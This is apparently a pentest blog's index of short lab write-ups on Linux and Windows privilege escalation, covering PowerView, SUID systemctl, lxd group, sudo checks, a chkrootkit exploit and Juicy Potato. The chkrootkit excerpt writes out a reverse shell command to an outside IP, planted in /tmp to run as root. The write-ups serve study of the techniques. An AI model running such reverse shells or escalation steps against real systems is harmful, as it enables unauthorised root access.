Privilege Escalation on rchitect

Powerview usage for privilege escalation

Mon, 18 Jul 2022 00:00:00 +0000

Powerview Script usage for privilege escalation Link to heading

Powerview script can be for enumeration and privilege escalation.

The script can be downloaded from here.

I will explain few scenrios which i have used poweview for enumeration and privilege escalation. Most of times I will upload the file like this to windows( location C:\ProgramData)

Make sure to activate the script by using below command

Import-Module .\PowerView.ps1

Systemctl privilege escalation

Thu, 28 Apr 2022 00:00:00 +0000

Systemctl (suid enabled) privilege escalation Link to heading

Link to heading

Sceanrio: We have initial shell and during the checks we have found a systemctl file is enabled with SUID bit. refer below:

find / -perm -u=s -type f 2>/dev/null
/bin/fusermount
/bin/mount
/bin/ping
/bin/systemctl
/bin/umount
/bin/su
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device

As per checking GTFO site, its says as below

lxd group privilege escalation

Thu, 14 Apr 2022 00:00:00 +0000

lxd group privilege escalation Link to heading

Scanrio: As per checking the user privilege , there is one thing which can help us escalating the privilege.User belong lxd group Link to heading

orestis@brainfuck:~$ id
uid=1000(orestis) gid=1000(orestis) groups=1000(orestis),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),121(lpadmin),122(sambashare)

There are some exploits which shows the lxd privileges can be escalated.

On Kali machine: Link to heading

Download and build the alpine image

Privilege Escalation in Linux

Thu, 17 Mar 2022 00:00:00 +0000

Privilege Escalation for Linux machines before running scripts like linpeas Link to heading

I am trying explain the few commands which i use before i use any privilege escalation scripts like linpeas,linenum etc.

Sudo Privilege Link to heading

Check for any commands which are enabled with Sudo privilege and no password required to run. Remember that some time, you may have to erminate and re-initiate existing session, if no suo command is enabled.

chkrootkit exploit for privilege esclation

Wed, 09 Mar 2022 00:00:00 +0000

Chkrootkit Exploit Link to heading

I have tried pspy and i could see the chkrootkit

Lets search for the exploit

As per this exploit if you create any exploit ,if you create a file named “update” under /tmp.

amrois@nineveh:/tmp$ printf '#!/bin/sh\n' > update
amrois@nineveh:/tmp$ printf '/bin/bash -c "/bin/bash -i > /dev/tcp/10.10.14.9/5555 0<&1"\n' >> update
amrois@nineveh:/tmp$ chmod +x update

Or You can use EOF to repalce printf command like below

SeImpersonatePrivilege privilege escalation using Juicy Potato

Wed, 09 Mar 2022 00:00:00 +0000

Exploiting ‘‘SeImpersonatePrivilege’ using Juicypotato for privilege escalation Link to heading

Lets take a sceanrio we have initail reverse shell or nomral user shell which requires to be elvated as Administrator.Checking the Privilege of cuurent user we have noticed “SeImpersonatePrivilege” is enabled.

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name Description State 
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled 
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:\Windows\SysWOW64\inetsrv>

The below one privilege can be exploited using the [Juicypotato](Release Fresh potatoes · ohpe/juicy-potato · GitHub) for most of the windows machine